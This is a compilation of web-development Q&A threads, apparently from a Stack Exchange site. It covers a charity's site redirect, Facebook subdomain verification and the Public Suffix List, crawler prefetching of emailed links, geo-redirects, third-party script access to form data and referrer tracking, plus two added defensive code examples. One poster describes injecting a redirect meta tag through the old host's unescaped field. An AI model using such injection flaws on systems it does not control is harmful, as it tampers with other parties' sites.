301 Redirect with limited access to site - redirect

I've recently developed a new website for a local charity that organises an annual sporting event. With the event coming up in a few weeks we approached the previous/existing 'dev' company to either redirect the domain to the new site/server or transfer the domain to us.
This other 'company' is refusing to do anything, simply because they want to force the charity to stay with them, so that they get good local publicity.
So, we've purchased a new domain for the site but need to redirect the old site to the new one. Unfortunately the system the old web company uses is very poor and cumbersome. It also only gives us access to files which form the content of a given page. It doesn't however give us any access to the site template / style elements of the site, nor does it give us access to things like .htaccess file(s).
So, at the moment the best I've come up with is using the existing system's single input for the site description, to force in a meta refresh that will bump users over to the new domain/site. However, this isn't going to result in a permanent 301 redirect for users or search engines.
As such, I'm desperately hoping to come up with a way to force a 301 for all pages without directly accessing every page content file and manually adding in some sort of redirect.

Due to some crappy sitewide one-size-fits-all unescaped metatag implementation, I was able to inject an additional metatag with a redirect to the new domain.

How do you verify user-owned subdomains in Facebook?

As part of the upcoming changes to Facebook Ads, you now must verify ownership of your domain name.
We operate a SaaS platform where user content is hosted on subdomains (myaccount.example.com etc). We need these users to be able to verify ownership of their domain so they can track their own events. We have enabled them to add the meta tag on their domain, and this verifies okay.
<meta name="facebook-domain-verification" content="codefromfbhere" />
However, the problem is, when you go into 'Events manager' -> 'Aggregated event measurement' -> 'Configure web events', it shows me the root domain instead of the subdomain I just verified (e.g. example.com instead of myaccount.example.com).
This is possible, as Leadpages has achieved the same goal. When you add in a Leadpages subdomain, you're able to verify it via meta tag, and it shows the subdomain in the 'Web event configurations' area.
I don't see any extra headers that they have provided or anything else that would enable this.
How do you mark subdomains as independent from the eTLD+1?
I wanted to chime in with the perspective of someone who works for Facebook. For most businesses, even ones that host pages for other businesses, Aggregated Event Measurement without anything extra is the correct solution.
Advertisers who do not own their own domains will not be able to verify the domain for the purpose of event configuration in Ads Manager. Advertisers may consider purchasing their own domain to continue running their campaigns uninterrupted, or moving toward link clicks/landing page views for campaign optimization and reporting. We are currently investigating other solutions for this use case but do not have any additional information to share at this time.
For a very small number of businesses already on the Public Suffix List (PSL) subdomains will be able to get data as if they were a root domain. This is because being on the PSL basically makes the root domain name act as if it was a TLD (such as "co.uk" or "gov.au"). In almost every case it does not make sense for sites to request to be added to the PSL as this dramatically changes how the Public Suffix listed domain name will function.
The PSL process is intended only for platform providers that provide subdomains for large numbers of small businesses which really ought to be treated as though they were in fact separate domains.
The Public Suffix List is not useful, nor intended to be used as a means to gain additional subdomain events reporting. Adding a domain name to the PSL means that there will be total cookie separation between subdomains and that cookies will become disabled on the root domain. If a domain gets added to the PSL you'll not have much control for that site itself. For example, if you have a /login page on that domain, this may not work as it does today if you proceeded with a PSL addition, as cookies may get disabled on the root domain.
It’s also important to note that browsers will enforce the behavior described based on their own update cadence of the PSL. Some browsers don't update their lists more regularly than bi-annually. This means that if you're on the list and a browser updates their copy of the list, and you later decide to not be on the list, there may not be an easy way to back out the effects; it's not as simple as submitting another request to get taken off of the list.
More information can be found at Facebook’s help center article here.
[Update Mar 19 2021]
Facebook just announced they will be supporting the Public Suffix List for domain verification and event configuration. This means that merchants using a registered domain on the Public Suffix List will be able to use that domain for verifying and configuring their top 8 events on the domain. For example, if myplatform.com is a registered domain on the Public Suffix List, then Jasper, a merchant with the subdomain jasper.myplatform.com, would now qualify as an effective eTLD+1 and would be able to verify "jasper.myplatform.com" and use it to configure their top 8 events in the web events configuration tool.
Read more here:
https://developers.facebook.com/docs/sharing/domain-verification
[Original Answer]
For the upcoming changes for Apple iOS 14.5, you can only verify the root domain, which is example.com in your example, in order to set up the web event configurations.
The only way you can do this is to provide your clients a way to buy/set up their own domain on your service.
You may watch the webinar recording here
https://www.facebook.com/business/m/sessionsforsuccess
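The two answers above turn on what being listed in the Public Suffix List does to a platform's subdomains. The following is an added example, not code from either answer or from Facebook: a minimal PSL matcher (including the list's wildcard and exception rule forms) run once with a constructed rule excerpt and once with the hypothetical platform domain myplatform.com added, showing how jasper.myplatform.com becomes its own eTLD+1 and how a cookie set on the root domain is then rejected.

```python
# Added example: a minimal Public Suffix List (PSL) matcher showing what listing
# a platform's domain does to the registrable domain (eTLD+1) of its customer
# subdomains and to cookie scoping. Rule sets are constructed excerpts; the
# real list lives at publicsuffix.org.

BASE_RULES = ["com", "co.uk", "*.ck", "!www.ck"]
# The same excerpt after the hypothetical platform added itself to the PSL:
PLATFORM_RULES = BASE_RULES + ["myplatform.com"]


def _labels(host):
    return host.lower().strip(".").split(".")


def public_suffix(host, rules):
    """Longest matching PSL rule for host; an exception rule ('!') wins outright."""
    labels = _labels(host)
    best = labels[-1:]  # implicit default rule '*': the last label alone
    for rule in rules:
        is_exception = rule.startswith("!")
        r = _labels(rule.lstrip("!"))
        if len(r) > len(labels):
            continue
        tail = labels[-len(r):]
        if all(a == b or a == "*" for a, b in zip(r, tail)):
            if is_exception:
                return ".".join(tail[1:])  # exception drops its leftmost label
            if len(tail) > len(best):
                best = tail
    return ".".join(best)


def registrable_domain(host, rules):
    """eTLD+1: public suffix plus one label, or None when host is itself a suffix."""
    labels = _labels(host)
    n = len(public_suffix(host, rules).split("."))
    return ".".join(labels[-(n + 1):]) if len(labels) > n else None


def cookie_domain_accepted(request_host, cookie_domain, rules):
    """Mimic the browser rule: a Domain attribute that is itself a public suffix
    is rejected, and request_host must lie within the cookie's domain."""
    cookie_domain = cookie_domain.lstrip(".").lower()
    if registrable_domain(cookie_domain, rules) is None:
        return False
    h = request_host.lower()
    return h == cookie_domain or h.endswith("." + cookie_domain)


if __name__ == "__main__":
    for rules, label in ((BASE_RULES, "before listing"), (PLATFORM_RULES, "after listing")):
        print(label, registrable_domain("jasper.myplatform.com", rules),
              cookie_domain_accepted("myplatform.com", "myplatform.com", rules))
```

The second line printed is the answer's warning in miniature: once the root is a public suffix, a /login page on myplatform.com can no longer set a cookie for itself.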

Are URLs in emails indexed by search engines so they become publicly searchable?

I have read a few questions on here about e-mail clients prefetching URLs in e-mails. An answer to this seems to be to add a new confirmation page, where the user has to click a button to confirm the desired action.
But, this answer states the following:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails arriving in your inbox and it sends all found URLs to Bing, to be indexed by Bing crawler.
This effectively makes all one-time use links like login/pass-reset/etc useless.
(Users of my service were complaining that one-time login links don't work for some of them and it appeared that BingPreview/1.0b is hitting the URL before the user even opens the inbox)
Drupal seems to be experiencing the same problem: https://www.drupal.org/node/2828034
My major concern is with this statement:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails arriving in your inbox and it sends all found URLs to Bing, to be indexed by Bing crawler.
If this is the case, any URL in an e-mail meant to confirm an action, e.g. confirming a login, subscription, or unsubscription, can end up searchable in a search engine, if that's what's meant by indexed in the quote above. In this case, it's Bing. Not even a dedicated confirmation page where the user confirms the desired action truly mitigates this.
Scenario #1
If I email the user a login link with a one-time token in the URL, that URL will end up in Bing. This token will have a short lifetime, let's say 5 minutes, so I doubt anyone will manage to search on Bing and find the URL before the user clicks it or it expires.
Scenario #2
The user gets an e-mail with a link to confirm a subscription. This link is perhaps valid for 24 hours. This might(?) be long enough for someone else to stumble over the link on a search engine and accidentally (or on purpose) confirm the subscription on behalf of the user.
Scenario #2 is not uncommon, it's even best practice to use double opt-in as far as I am aware.
Scenario #3
Unsubscribe URLs in the bottom of newsletters. Maybe valid forever? You don't want this publicly searchable in a search engine.
Assume all the one-time confirmation links land on a confirmation page where the user confirms the desired action.
Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing? And will they actually end up publicly searchable? If not, what is meant by indexed in the quote above?
I'll add for the sake of completion that I don't think I've had much of a problem with this in my own use of the web, so my gut feeling is that this is unlikely the case.
Is it truly the issue that URLs in e-mails are indexed by search engines, at least Bing?
I can't definitively say if they are being indexed or not, only Bing could answer this question, but they are surely being visited, at least with a simple GET request. I just tested this sending myself a link to a page on my website that logs the requests that are made against it, and indeed I'm seeing a GET coming from 207.46.13.181 (reverse DNS says msnbot-207-46-13-181.search.msn.com), which suggests that an automated program from search.msn.com is crawling the link. This leads me to believe that yes, they are trying to index the link's content somehow, but it's only my opinion really.
And will they actually end up publicly searchable? If not, what is meant by "indexed" in the quote above?
Well, again, impossible to say unless you work for Bing. In any case, "indexing" means exactly what you think it does: parsing the content of a page to potentially include it in search results.
The real question here is: does this somehow represent a security problem or will it compromise my website's functionality?
It surely has the potential to: if your confirmation/reset/subscription/whatever process only relies on a single GET request with the appropriate GET parameter, then you should definitely revisit the strategy, as it obviously allows anyone to perform the action (even maliciously for example enumerating possible IDs for your GET parameters).
If the link you are trying to send contains sensitive information or can be used to alter important data for a user of your website, then you should at least put it behind a login page only giving access to the interested user. This way, anyone who wants to access it (including search engines) will be redirected to a login page if not already logged in.
If the link you are trying to send is just some kind of harmless confirmation link (e.g. subscribe/unsubscribe from a newsletter), then at least use a form inside the web page to do the actual confirmation through a POST request (possibly also using a CSRF token), otherwise you will unequivocally end up with false positives.
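The answer's recommendation, as an added example that is not code from the question or the answer: a framework-free model of a /confirm endpoint where the GET issued by a mail-scanning crawler only renders a form and the emailed token is consumed solely by a POST carrying a per-session CSRF token. The token store, session store, expiry and the sample token values are constructed for the example.

```python
# Added example: two-step confirmation so that a prefetching crawler's GET on an
# emailed link cannot perform the action. State below is constructed in memory.
import secrets
import time

# emailed token -> (email, expiry timestamp); one entry is already expired
PENDING = {
    "tok-abc123": ("alice@example.org", time.time() + 24 * 3600),
    "tok-old": ("bob@example.org", time.time() - 60),
}
CONFIRMED = set()
SESSIONS = {}  # session id -> CSRF token


def get_csrf(session_id):
    """Per-session CSRF token, created on first use."""
    return SESSIONS.setdefault(session_id, secrets.token_urlsafe(32))


def handle(method, params, session_id):
    """Return (status, body) for /confirm. Only a valid POST consumes the token."""
    token = params.get("token", "")
    entry = PENDING.get(token)
    if entry is None or entry[1] < time.time():
        return 404, "unknown or expired link"
    if method == "GET":
        # Safe and idempotent: crawlers and link previews land here harmlessly.
        form = ('<form method="post"><input type="hidden" name="token" value="%s">'
                '<input type="hidden" name="csrf" value="%s"><button>Confirm</button></form>')
        return 200, form % (token, get_csrf(session_id))
    if method != "POST":
        return 405, "method not allowed"
    expected = SESSIONS.get(session_id)
    submitted = params.get("csrf", "")
    if not expected or not secrets.compare_digest(submitted, expected):
        return 403, "bad csrf token"
    email, _ = PENDING.pop(token)  # single use: a replay now gets 404
    CONFIRMED.add(email)
    return 200, "subscription confirmed for " + email


if __name__ == "__main__":
    print(handle("GET", {"token": "tok-abc123"}, "crawler"))  # form only
    csrf = get_csrf("alice")
    print(handle("POST", {"token": "tok-abc123", "csrf": csrf}, "alice"))
```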

How to redirect a website according to country's IP address

I'm working on a messenger app whose server side code is developed in Erlang.
The problem which I'm facing is regarding redirection of website according to country specific domain.
For example: when a user types google.co in the message box, it automatically displays google.co.uk; how can I redirect it to google.co.in if I'm in India?
For finding country's location, I found this library on github: https://github.com/mochi/egeoip
How can I use this geoLocation for redirecting to particular country specific website?
ScreenShot, when I entered facebook.com, it automatically displays preview in my local language.
But in case of my app, it shows preview in some foreign language, Russian maybe.
I've read the comments, and since you are not considering having datasets as an option, I think what you may want to do is something like this:
First thing to understand is how those previews work. In any (popular) messaging app, if you type in a URL, the app will send a request to the URL and get the website metadata. Then it will be displayed in the UI.
The country detection, is a bit more complicated and done in a variety of ways. But thankfully, you (almost) don't have to do anything. This is a rather long topic, but I'll try to shorten it out.
Text Localization
In some websites (might be the case of Facebook's in your example), they do country detection on the application layer, and then based on that country, it will use a specific language for the website's text. This all usually happens before the website renders its content, so you do not have to worry about it.
GeoDNS
This one occurs on the DNS layer, and is probably the most popular. Domain names can be assigned a handful of IP addresses. These IPs can point to different versions of the website, and in the case of GeoDNS it will be up to the DNS manager to assign a country to an IP. So when a DNS query comes from Russia, the requesting IP's country will be resolved and then the IP assigned to it (if any) will be returned. This is used by websites especially for country-specific features or content. Best example is Netflix.
Redirects
In case of Google redirecting you to a different domain, this might be how they do it. Country is being resolved via the IP address in the application (HTTP) layer, and then it does a 301/302 redirect, pointing to the new domain name. This one, you may need to do something on. So given that your application needs to do an HTTP request to the URL the user has entered, if it returns a redirect, you must follow it. Many HTTP libs/clients already do this, but on some you might have to explicitly turn on the option to follow redirects.
One important thing to note is to do the HTTP request on the client side. Otherwise, you will be resolving to the same country (where your server resides) regardless of where your user is.

Google Analytics - can it collect form data?

Simple scenario:
I have a signup form, with user name, password, email address, may be credit card number.
At the bottom of the page, I implement the Google Analytics code.
When the user clicks submit, it goes to a page without Google Analytics.
question is..
can GA get the data (user name, password, email, etc.) in the first form after the user inputs the data?
Do they say anything about it in their TOS or Privacy policy?
Yes. Any <script> you include in the page has complete access to alter the user's interaction with the site due to the Same Origin Policy. Google, if they were feeling Evil today, could certainly rewrite the action of your <form> to point to themselves, or log every keypress, or create an <iframe> containing another page on your site and simulate the user clicking on any action in that page.
Do not include <script> on any page from a party you don't completely trust with the security of everything on your site. Even a single tracking or advertiser script on any page compromises everything on the same hostname (and maybe other subdomains if you are setting window.domain to allow cross-hostname-scripting, or sharing cookies between hostnames).
However, the Analytics script doesn't currently do any of these things and the form submission will not flow to Google as a matter of course; they would have to deliberately act to steal the data. Clearly it would be disastrous for them to be discovered doing it, so they presumably won't. But technically, they could. It always pains me to see third-party ad and tracking scripts on bank sites.
UPDATE: The landscape has changed quite a bit over the years since my original answer below was written: the scripts are now generally served (or at least have the option to be fetched) over HTTPS, so those scripts should be secure against the trivial man-in-the-middle attacks. However, you are still trusting the script source not to do malicious stuff in your page, since they still get to fully control what happens on your web page.
Original answer:
Yes. I recommend against putting any third party script on sensitive pages secured by SSL. It's not likely that Google is going to hijack sensitive data on your page but you should take into account the possibility that a malicious ISP can hijack the request (say, using DNS) to Google Analytics script and do whatever it wants on your page.

is it possible to know where the user is coming from when he uses the back button?

For example,
if user goes to google -> example.com -> newwebsite.com
If he goes back to example.com, the http-referrer page will still be google.com
How can I detect that he went to newwebsite.com
I believe that the back button will send the HTTP headers that were sent to the site the first time around, since it's not really a new visit.
Say you displayed an error page if the user's http-referrer was newwebsite.com. The first time they visited, they would get your site. If they went to newwebsite.com, and then hit back (meaning they wanted to go back in time, through their browser history, not load the page again with new headers), then they would get an error page, and the nature of the back button would be defeated. I don't know if this inspires that behavior or not, it just makes sense to me that way.
Maybe it's possible, but it would be entirely browser-dependent. Why do you need this functionality, anyway? Newwebsite isn't referring the user to your website at all, there's no connection between the two at all--it just happens to be the last page that the user visited.
If a visitor uses the back button, the page might be loaded from browser cache. In that case, no referrer is sent.
Using google analytics, you can see how many visitors came from a given web site. This might give you some information.
I don't believe that this is generally possible. You could pull tricks with javascript on your site so that all the links navigated from there could be detected and recorded, but once the users off your site you've got no control.
If you provided the browser, i.e. developed one yourself, then you could choose to expose the browser history via an API.
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
Describes a technique for exploiting the browsers agreement to modify links to indicate that they have been traversed (eg. changing the colour of the link) so that visited sites can be detected, however this only works for a pre-declared set of links, it's not a generally applicable approach.
My feeling is that attempts to hide the nature of browsers - users can hop around all over the place - tend to lead to unsatisfactory 79% solutions that mystify users.
What problem are you actually trying to solve?
You can use sessions in order to track the path of pages. It really works well. Try it.